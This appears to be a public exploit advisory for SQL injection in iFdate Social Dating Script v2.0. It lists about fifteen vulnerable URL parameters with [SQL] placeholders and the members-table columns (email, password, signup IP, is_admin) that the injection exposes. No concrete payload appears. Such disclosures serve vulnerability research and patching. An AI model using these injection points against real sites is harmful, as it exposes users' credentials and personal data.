40 lines
No EOL
1.5 KiB
Text
40 lines
No EOL
1.5 KiB
Text
# # # # #
|
|
# Exploit Title: iFdate Social Dating Script v2.0 - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 18.03.2017
|
|
# Vendor Homepage: http://turnkeycentral.com/
|
|
# Software: http://turnkeycentral.com/scripts/social-dating-script/
|
|
# Demo: http://demo.turnkeycentral.com/ifdate/index.php
|
|
# Version: 2.0
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# #ihsansencan
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/members_search_results.php?gender=[SQL]
|
|
# http://localhost/[PATH]/members_search_results.php?sexuality=[SQL]
|
|
# http://localhost/[PATH]/members_search_results.php?marital=[SQL]
|
|
# http://localhost/[PATH]/members_search_results.php?ethnic=[SQL]
|
|
# http://localhost/[PATH]/members_search_results.php?country=[SQL]
|
|
# http://localhost/[PATH]/members_search_results.php?picture=[SQL]
|
|
# http://localhost/[PATH]/members_search_results.php?online=[SQL]
|
|
# http://localhost/[PATH]/my_profile_error.php?error_name=[SQL]
|
|
# http://localhost/[PATH]/my_profile_pictures.php?username=[SQL]
|
|
# http://localhost/[PATH]/my_profile_buddies.php?username=[SQL]
|
|
# http://localhost/[PATH]/my_profile_videos.php?username=[SQL]
|
|
# http://localhost/[PATH]/my_profile.php?username=[SQL]
|
|
# http://localhost/[PATH]/my_profile_guestbook.php?username=[SQL]
|
|
# members :id
|
|
# members :username
|
|
# members :email
|
|
# members :password
|
|
# members :signup_date
|
|
# members :signup_ip
|
|
# members :banned
|
|
# members :active
|
|
# members :is_admin
|
|
# Etc..
|
|
# # # # # |